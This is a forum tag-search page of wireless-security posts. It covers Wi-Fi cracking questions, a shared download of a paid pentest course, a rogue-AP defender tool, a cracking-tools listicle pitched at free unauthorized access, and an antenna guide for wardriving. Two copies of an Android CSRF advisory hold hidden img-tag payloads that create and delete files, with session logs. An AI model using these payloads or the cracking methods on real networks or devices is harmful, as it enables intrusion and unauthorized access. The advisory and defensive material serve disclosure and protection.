
Showing results for tags 'wireless'.



Found 21 results

  1. Hello! For some time I have been looking for adapters for Kali Linux (the newest version, 2020) for wireless pentesting. I want to be able to enable monitor mode, packet sniffing, everything a decent adapter should do these days. (I do not necessarily need 5G as well.) I know about the famous adapters from Alfa Networking, but in Romania you cannot find, for example, an Alfa AWUS036NHA, or pretty much anything from them. I bought a TP-Link TL-WN722N, but in the end I found out that it is not a V1 (this was not specified anywhere on the site I bought it from, and I received a v3), so I am going to return it. I want to avoid ordering from abroad during this period, so I would like some decent adapters (for beginners up to average users) that do not cost more than 150-170 (maybe up to 200 lei, but I am still thinking about that. You can leave recommendations up to 200; what matters is that they are from Romania). I can also buy a second-hand one if really necessary, but from what I have seen I would risk receiving a fake Alfa. Thank you!!!
  2. Hello everyone. I am back with a few questions about Wi-Fi pentesting. I went through the following steps: Method 1: I got an Alfa, which I connected to Kali Linux, then I scanned a few Wi-Fi networks and obtained a few handshakes for those networks, after which I exported those handshakes and copied them to Windows 10, where I have Aircrack (all fine so far). I imported the file containing that handshake into Aircrack, selected the encryption and key size 64, and launched it, but the program tells me that I have only 150 IVs and that I should try with at least 5000 IVs. What are these IVs and how do I obtain them? Are they packets, by any chance? For now I have chosen to try cracking that handshake with a fairly large wordlist (2GB), but the words are in English, so I am skeptical that it will work; if I find a Romanian wordlist I will try with that too. Method 2: The same network card + CommView for WiFi, then I scanned the targeted network (only 5 minutes because trial and yeah), captured a log (a few packets etc.), converted the file so that it can be run by Aircrack, and I get the same message as in the Linux method. The questions above remain: What are these IVs and how do I obtain them? Are they packets, by any chance? Can I scan the networks with something else to obtain a larger log and more packets, in the hope that I will catch 5k of those IVs (if so, how or with what software)? I am waiting for an answer from those who know more about this. Thanks in advance!
  3. Hello everyone. This is my first post on this forum, although I have been active on this site for more than a year. At the moment I live in the student dormitory, and my only connection to the internet is through a wireless network that is "bare, completely bare". That is, I am handed an unsecured wireless network on a plate, which means that someone can access my personal data far too easily. So I would like to ask you how I could "crack" a wireless password by a method more efficient than Backtracking, or whether anyone knows a good-quality free VPN (I doubt that a good-quality free one exists). Thank you. Have a nice day, everyone.
  4. Hi. I have searched the forum and have not found anything concrete; maybe I did not understand, but I hope to find here the answer I need. I am from the provinces, I am attending university and I rent a room in a dormitory. All well and good, except that this dormitory has no internet. The dormitory is located near a gas station, McDonald's, etc. Lots of free wireless networks. I found information on the forum about wireless antennas from Alfa, TP-Link, etc. I also saw antenna models on eMAG, etc. My question is: how can I pick up Wi-Fi on my laptop? I am interested in having wireless in my room, not in connecting via USB through those adapters, or, if it is possible, in connecting several devices from the router via internet cable. More precisely, how does all this work? I hope this makes sense. Thank you!
  5. Hi. So, as it says in the description, I want to make a receiver (for PC) for a (wireless) Xbox 360 controller. I found a video that explains all the steps; the problem is that I have a different model of circuit board and the circuits differ... This is the video I found showing what I want to do: This is my board, taken from a 2010 model Xbox 360: Imgur: The most awesome images on the Internet So, if anyone can help me, I would be grateful...
  6. The wireless industry continues to grow in leaps and bounds with more and more gadgets evolving to be wireless. Wireless access points, media centers, phones, and even security systems are commonplace in the average household. Unfortunately, the security that is implemented on this equipment is often lacking, opening the devices to severe security vulnerabilities. In practice, many companies and organizations still use and deploy vulnerable wireless gear, often in their default configurations. This is most often due to poor security awareness or a lack of understanding of the risks and ramifications. Download: https://www.dropbox.com/s/bi60f383g4phbuu/Offensive%20Security%20Wireless%20Attacks%20-%20WiFu%20v3.0.7z?dl=0 pwd: rstforums.com
  7. The nation’s first ever criminal case involving a hijacked wireless Internet connection came to light this month, prompting online security experts to warn that home Wi-Fi routers may be open to attack if not properly protected. Users need to set a password and switch on encryption, or their network can be hacked within minutes by someone close enough to eavesdrop on the wireless signal, such as a user in an adjacent apartment, said Yuichi Nozawa, a consultant with the government-affiliated Information-technology Promotion Agency (IPA), a body that advises on digital security. Cracking the security itself is relatively simple for one common form of encryption and can be done using free software. The IPA delivered the warning last Friday, a day after the rearrest of a man suspected of tapping into a nearby Wi-Fi network in Matsuyama, Ehime Prefecture. Hirofumi Fujita, 30, is separately on trial for allegedly stealing ¥16 million by obtaining online banking IDs and passwords as well as sending computer viruses to gain unauthorized remote access to other people’s computers. Moreover, the agency warned that hackers can use hijacked wireless networks to hide their identities, leading “even ordinary people with no criminal intention” to become the main suspects in cybercrimes, Nozawa said Monday. He said police sometimes identify suspects by the Internet access point used. A further problem lies in the fact that it is not easy for ordinary users to detect if their network has been hacked, he said. Many users remain unaware of the risks. In 2014, the IPA reported that more than 50 percent of households either had not set password protection on their home wireless network or were unsure whether it was active. But even if a wireless network is password-protected, it needs to use a newer form of encryption, as older ones can be cracked fairly easily. 
Older routers may offer Wired Equivalent Privacy (WEP) encryption as the default setting, which Nozawa said can be hacked. The alleged Ehime hacker is suspected of using this technique, deploying software that came as a free gift with an IT security magazine. Instead, Nozawa recommends using Wi-Fi Protected Access II, better known as WPA2, a higher form of encryption and one usually offered by newer network devices. The IPA recommends contacting manufacturers’ support teams to find out how to configure the security settings, as the procedure varies from device to device. Source
  8. Price: 150. Contact method: PM. Payment method: On delivery. Warranty: Yes. Quantity: 1. City: Bucuresti. Delivery method: Hand delivery. Verbatim MediaShare Wireless. The product is new. Sealed! PHOTOS
  9. Top 10 Free Wireless Network hacking tools for ethical hackers and businesses
  10. EvilAP_Defender is an application that helps wireless network administrators to discover and prevent Evil Access Points (AP) from attacking wireless users. The application can be run at regular intervals to protect your wireless network from Evil Twin-like attacks. By configuring the tool you can get notifications sent to your email whenever an evil access point is discovered. Additionally, you can configure the tool to perform DoS on a discovered evil AP in order to give the administrator more time to react. However, notice that the DoS will only be performed for evil APs which have the same SSID but a different BSSID (AP’s MAC address) or are running on a different channel. This is to avoid DoSing your legitimate network.

      The tool is able to discover evil APs using one of the following characteristics:
      * Evil AP with a different BSSID address
      * Evil AP with the same BSSID as the legitimate AP but a different attribute (including: channel, cipher, privacy protocol, and authentication)
      * Evil AP with the same BSSID and attributes as the legitimate AP but a different tagged parameter - mainly a different OUI (tagged parameters are additional values sent along with the beacon frame. Currently no software based AP gives the ability to change these values. Generally software based APs are so poor in this area).

      Whenever an Evil AP is discovered the tool will alert the admin through email (SMS will be supported soon). Additionally the tool will enter into preventive mode, in which the tool will DoS the discovered Evil AP. The tool can be configured easily by starting in what we call “Learning Mode”. In this mode you can whitelist your legitimate network. This can be done by following the wizards during the Learning Mode. You can also configure the preventive mode and admin notification from there as well. Finally, you need to change into Normal Mode or re-run the tool in this mode in order to start discovering Evil APs.

      Requirements:
      - Aircrack-ng suite
      - Your wireless card must be supported by Aircrack-ng. Check the following URL: compatibility_drivers [Aircrack-ng]
      - MySQL
      - Python

      Learning Mode: This mode can be invoked with the “-L” switch. When running the tool in this mode the tool will start by scanning for the available wireless networks. Then it lists all the found wireless networks, with whitelisted APs colored green. It also lists the whitelisted APs and OUIs (tagged parameters). The tool also provides several options which allow you to add/remove SSIDs into/from the whitelist. You need to whitelist your SSID first before running the tool in the Normal Mode. Moreover, you can configure Preventive Mode from “Update options -> Configure Preventive Mode”. First you need to set the Deauthentication time (in seconds) to a number bigger than 0 (setting the value to 0 will disable this mode). Then you need to set the number of times to repeat the attack. This is very important for attacking more than one Evil AP, because the tool cannot attack all of them at the same time (how can you attack several APs on different channels? Later on we will improve the tool and allow it to attack (at the same time) several APs on the same channel). The tool will attack the first Evil AP for the specified deauthentication time, then it will stop and attack the second one, and so on. Be careful about increasing the Deauth time too much, because this may attack only one AP and leave the others running. My recommendation is to set the Deauth time to something suitable such as 10 seconds and to increase the repeat time. Finally, you can configure admin notification by setting the admin email, SMTP server address, SMTP username (complete email address) for authentication purposes, and SMTP password. You can use any account on Gmail or your internal SMTP server account.

      Normal Mode: This is the mode in which the tool starts to discover Evil APs and notify the administrator whenever one is discovered. This mode can be invoked with the “-N” switch.

      Feedback: Feedback is always welcomed on the tool git or through my email: moha99sa at yahoo dot com. Download Source
  11. Document Title:
      ===============
      Wireless File Transfer Pro Android - CSRF Vulnerabilities

      References (Source):
      ====================
      http://www.vulnerability-lab.com/get_content.php?id=1437

      Release Date:
      =============
      2015-02-25

      Vulnerability Laboratory ID (VL-ID):
      ====================================
      1437

      Common Vulnerability Scoring System:
      ====================================
      2.3

      Product & Service Introduction:
      ===============================
      Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
      (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

      Abstract Advisory Information:
      ==============================
      An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application.

      Vulnerability Disclosure Timeline:
      ==================================
      2015-02-25: Public Disclosure (Vulnerability Laboratory)

      Discovery Status:
      =================
      Published

      Affected Product(s):
      ====================
      Lextel Technology
      Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1

      Exploitation Technique:
      =======================
      Remote

      Severity Level:
      ===============
      Medium

      Technical Details & Description:
      ================================
      Multiple cross site request forgery issues have been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.

      Proof of Concept (PoC):
      =======================
      The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

      Create New Folder
      <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

      --- PoC Session Logs [GET] (Execution) ---
      GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
      Host: 192.168.1.2:8888
      User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
      Connection: keep-alive

      HTTP/1.1 200 OK
      Cache-control: no-cache
      Content-length: 4

      <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

      Delete File, Folder
      <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

      --- PoC Session Logs [GET] (Execution) ---
      GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
      Host: 192.168.1.2:8888
      User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
      Connection: keep-alive

      HTTP/1.1 200 OK
      Cache-control: no-cache
      Content-length: 30

      Reference: http://localhost:8888/

      Security Risk:
      ==============
      The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3)

      Credits & Authors:
      ==================
      Hadji Samir [s-dz@hotmail.fr]

      Disclaimer & Information:
      =========================
      The information provided in this advisory is provided as it is without any warranty.
  12. Internet is now the basic need of our daily life. With the increasing use of smartphones, most of the things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use it for free. But most of these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks.

      Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing.

      In this article, I am going to discuss wireless security and best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks.

      Wireless Networks and Hacking

      Wireless networks are based on IEEE 802.11 standards defined by IEEE (Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way.

      Basically there are two types of vulnerabilities which can be found in the Wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include the weak password, no security settings, use of default configurations, and other user related things. Poor encryption is related to security keys used to protect the wireless network. It is there because of issues in WEP or WPA.

      WEP and WPA

      WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weaknesses were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security.

      Basically wireless hacking tools are of two types. One of which can be used to sniff the network and monitor what is happening in the network. And other kinds of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting.

      1. Aircrack

      Aircrack is one of the most popular wireless password cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations.

      The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try Live CD or VMWare image. VMWare Image needs less knowledge, but it only works with a limited set of host OS, and only USB devices are supported.

      Before you start using this tool, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you will follow steps properly, you will end up getting success with this tool.

      Download: http://www.aircrack-ng.org/

      2. AirSnort

      AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.

      Download: http://sourceforge.net/projects/airsnort/

      3. Cain & Abel

      Cain & Abel is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. If you are trying to learn wireless security and password cracking, you should once try this tool.

      Download: http://www.oxid.it/cain.html

      4. Kismet

      Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms.

      Download: http://www.kismetwireless.net/

      5. NetStumbler

      NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler. Basically NetStumbler is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more.

      But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64 bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool.

      Download Netstumbler: http://www.stumbler.net/

      6. inSSIDer

      inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was opensource. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records.

      Download inSSIDer: http://www.inssider.com/

      7. WireShark

      WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaris, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge.

      Download Wireshark: https://www.wireshark.org/

      8. CoWPAtty

      CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack.

      Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hash for each word contained in the dictionary by using the SSID.

      The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIDs. But if your SSID is not in those 1000, you are unlucky.

      Download CoWPAtty: http://sourceforge.net/projects/cowpatty/

      9. Airjack

      Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network.

      Download AirJack: http://sourceforge.net/projects/airjack/

      10. WepAttack

      WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.

      Download WepAttack: http://wepattack.sourceforge.net/

      11. OmniPeek

      OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool.

      Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

      12. CommView for WiFi

      CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted by user-defined WEP or WPA keys.

      This tool is basically for wi-fi network admins, security professionals, and home users who want to monitor their wi-fi traffic and programmers working on software for wireless networks.

      Download CommView: http://www.tamos.com/products/commwifi/

      13. CloudCracker

      CloudCracker is the online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks.

      Try Cloudcracker: https://www.cloudcracker.com/

      Conclusion

      In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works.

      As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network.

      Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network.

      I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human error, I may miss something. If I forgot any important tool in this, please let me know in the comments. Source
  13. Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)

Release Date:
=============
2015-02-10

Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)

Technical Details & Description:
================================
A cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.

Proof of Concept (PoC):
=======================
Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">

Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source
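The mitigation side of the advisory above, as an added example that is not part of the advisory or the vendor's code: a request gate that refuses the state-changing `create` and `deleteFile` actions unless they arrive as a same-origin POST carrying a per-session token. The token scheme, the function names and the sample requests are assumptions constructed for illustration.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

# Actions from the advisory's PoC that modify files on the device.
STATE_CHANGING_ACTIONS = {"create", "deleteFile"}


def same_origin(headers):
    """True when Origin (or, failing that, Referer) points at the Host we serve."""
    host = headers.get("Host", "")
    source = headers.get("Origin") or headers.get("Referer")
    if not host or not source:
        return False  # no provenance header at all: treat as cross-site
    return urlsplit(source).netloc == host


def hardened_gate(method, target, headers, session_token, request_token=None):
    """Decide whether a request may run. Returns (allowed, reason)."""
    action = parse_qs(urlsplit(target).query).get("action", [""])[0]
    if action not in STATE_CHANGING_ACTIONS:
        return True, "read-only action"
    if method != "POST":
        # An <img src=...> tag can only issue GET, so this alone stops the PoC.
        return False, "state change requires POST"
    if not same_origin(headers):
        return False, "cross-origin request"
    if not request_token or not hmac.compare_digest(request_token, session_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample requests (method, target, headers, token sent by client).
SESSION_TOKEN = "constructed-token-7f3a"  # hypothetical per-session secret
HOST = "192.168.1.2:8888"
SAMPLES = [
    # The advisory's image-tag request, embedded in a page on another site.
    ("GET", "/fileExplorer.html?action=create&type=folder&folderName=test1",
     {"Host": HOST, "Referer": "http://other-site.example/page.html"}, None),
    # A forged cross-site form POST: right method, wrong origin, no token.
    ("POST", "/fileExplorer.html?action=deleteFile&fileName=test",
     {"Host": HOST, "Origin": "http://other-site.example"}, None),
    # Same-origin POST that lacks the token.
    ("POST", "/fileExplorer.html?action=deleteFile&fileName=test",
     {"Host": HOST, "Origin": "http://" + HOST}, None),
    # Legitimate request from the app's own page.
    ("POST", "/fileExplorer.html?action=create&type=folder&folderName=test1",
     {"Host": HOST, "Origin": "http://" + HOST}, SESSION_TOKEN),
    # Directory listing stays available over GET.
    ("GET", "/fileExplorer.html?action=brower&path=/sdcard",
     {"Host": HOST}, None),
]


def evaluate(samples=SAMPLES):
    """Run every sample through the gate and return the decisions in order."""
    return [hardened_gate(m, t, h, SESSION_TOKEN, tok) for m, t, h, tok in samples]


if __name__ == "__main__":
    for (method, target, _, _), (allowed, reason) in zip(SAMPLES, evaluate()):
        print(f"{'ALLOW' if allowed else 'DENY ':5} {method:4} {target}  ({reason})")
```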
  14. Introduction

Wardriving is an activity in which a person seeks wireless access points from a moving vehicle with high gain antennas mounted on top. Usually, this access point data is correlated with GPS positions and marked on publicly accessible maps such as WiGLE. On the other hand, wireless penetration tests are focused evaluations of wireless security pertaining to an organization. In both of these cases—and any type of wireless communication—antennas play a critical role. They can mean the difference between hassle-free communication and bitter frustration. However, antenna designs and their implications are arcane topics that deserve sincere exploration by security enthusiasts. The antennas in your arsenal can make or break your wardriving or wireless penetration testing efforts. Whether you are a wardriving aficionado or a wireless penetration tester, this paper is intended to help you deduce the best antenna for your requirements.

Terminology You Should Know

Wi-Fi operates in the 2.4 GHz radio frequency band, and its signal strength is measured in decibels (dB). To follow discussions of antenna performance, you must familiarize yourself with the following terms:

dBm: dBm means decibel-milliwatts. Wi-Fi network signal levels are usually measured in dBm. The negative sign is used because the transmission power is never strong enough for the signal level to be positive. For instance, to get a 0.00 dBm signal, you would need a transmission power of 0.001 watts.

-30 dBm: Maximum possible value; you are right next to the access point (within a few feet).
-67 dBm: Minimum requirement for timely packet delivery (e.g. for VoIP or video streaming).
-70 dBm: Minimum requirement for reliable packet delivery (e.g. for web surfing).
-80 dBm: Minimum requirement for maintaining a basic connection; you will experience some packet drops.
-90 dBm: Barely able to maintain a connection; SNR is low; functionality is severely impaired.

Link Quality: Simply stated, link quality is indicative of the SNR (Signal to Noise Ratio), which is a measurement of interference versus the strength of your ‘point-to-point’ or ‘point-to-multipoint’ link. Accordingly, higher link quality will imply a lower number of packet errors.

Antenna Gain: Do not be confused by this term; the antenna does not actually amplify anything. Antenna gain is a figure that reflects how efficiently your receiving antenna would convert Wi-Fi radio waves into electrical power. Antennas with a gain of 2 dBi, 5 dBi, 7 dBi, 9 dBi, 13 dBi etc. are available. A common mistake is to think that the one with a high dBi would be the best (e.g. 13 dBi). To understand why this is a misconception, consider the following rough sketch [Figure 1]:

As evident from this figure, a higher (9) dBi antenna is suitable for long horizontal ranges with the receiver and transmitter at roughly the same elevation. However, if the transmitter is placed vertically above the receiver—as in floors of a building—then a 5 dBi antenna would be your best bet. If the transmitter is at a different elevation and at a long distance from the receiver, a 7 dBi antenna would offer you the right combination of elevation and range. A 2 dBi antenna aims to cover signals equally in all directions, and is not well-suited for wireless penetration testing or wardriving.

How well do these antennas work?

The short answer is: if correctly chosen, they perform well. The right type of antenna, with proper orientation, is able to pick up signals from miles away. However, it is imperative to point out here that many users who purchase external antennas end up being dissatisfied with their performance. The reasons for this are:

Unrealistic expectations: This may seem obvious, but these antennas are not magical devices that will pick up signals from great distances, especially when they are improperly chosen (wrong type of antenna) or have not been calibrated (aligned) well.
Insufficient knowledge: If you are purchasing a wireless antenna, or constructing a custom one, you should be able to define your purpose and have the knowledge to choose the proper antenna that would satisfy this purpose.

To test how well an external antenna performs in contrast with a laptop’s default antenna under the same conditions, we set up the following experiment. The distance between the access point and our antennas was carefully chosen so that the internal antenna could barely receive a signal at this point.

Interfaces: ‘wlan0’ - internal antenna; ‘wlan1’ - external antenna, omnidirectional, 5 dBi
Distance between AP and antennas: 7.62 meters or 25 feet
Obstructions: Two concrete walls and two trees

We noticed that at this distance, using the internal antenna, we were barely able to ping the wireless router at 192.168.0.1. As evident from the roundtrip delay time of several milliseconds [Figure 2], the internal antenna was performing poorly and there were multiple packet drops.

At the same distance, our standard 5 dBi omnidirectional external antenna was able to outperform the internal antenna, as evident from the decreased roundtrip delay time [Figure 3].

Let us examine the performance of both antennas in terms of link quality and signal levels. For the internal antenna, both the link quality and the signal level were extremely poor [Figure 4]. We were able to obtain a reliable connection using the external antenna under the same conditions [Figure 5].

These results indicate that there is a definite performance boost when an external antenna is used—how significant this boost is would depend on the suitability of the antenna for the receiving conditions. This brings us to the next section.

Choosing the Right Type of Antenna

There are a variety of antenna types, and each type is built with specific needs in mind. There is no “best antenna for wardriving or penetration testing”.
Understanding the design and purpose of each of these would help you choose the best one. An omnidirectional antenna spreads energy equally in all directions—which means shorter range. A directional antenna is able to take this same energy and focus it towards a particular direction—implying longer range in that direction.

Omni-Directional Antennas

This is the most common antenna type, and most if not all of you have seen one up close. For instance, the antenna on top of your car is an omnidirectional antenna. These can be used for ‘point-to-multipoint’ purposes such as to serve as the wireless router antenna that transmits signals to all devices in the vicinity [Figure 6]. These are not suitable to be used for point-to-point communications because transmitting signals in all directions, when you want them to go from point A to point B, is an inefficient choice.

Suitability for wardriving: These are ideally suited for wardriving, since they grab signals from all directions while you are driving. However, there are some considerations: a 9 dBi omnidirectional antenna would allow you to capture far off signals from all directions, but it will miss access points in high buildings close to your vehicle. To understand why, see Figure 1. Accordingly, it is advised that you choose the correct dBi omnidirectional antenna suited for the areas you are going to drive in.

Suitability for penetration testing: During a penetration test, you are aware of your target. Hence, a directional antenna pointed toward the target is more efficient than an omnidirectional antenna. However, you can use a 5 dBi omnidirectional antenna during perimeter testing.

Parabolic Antennas

Parabolic antennas depend on a curved parabolic surface dish that focuses signals towards a central point [Figure 7]. This enables these antennas to put out incredible gains.
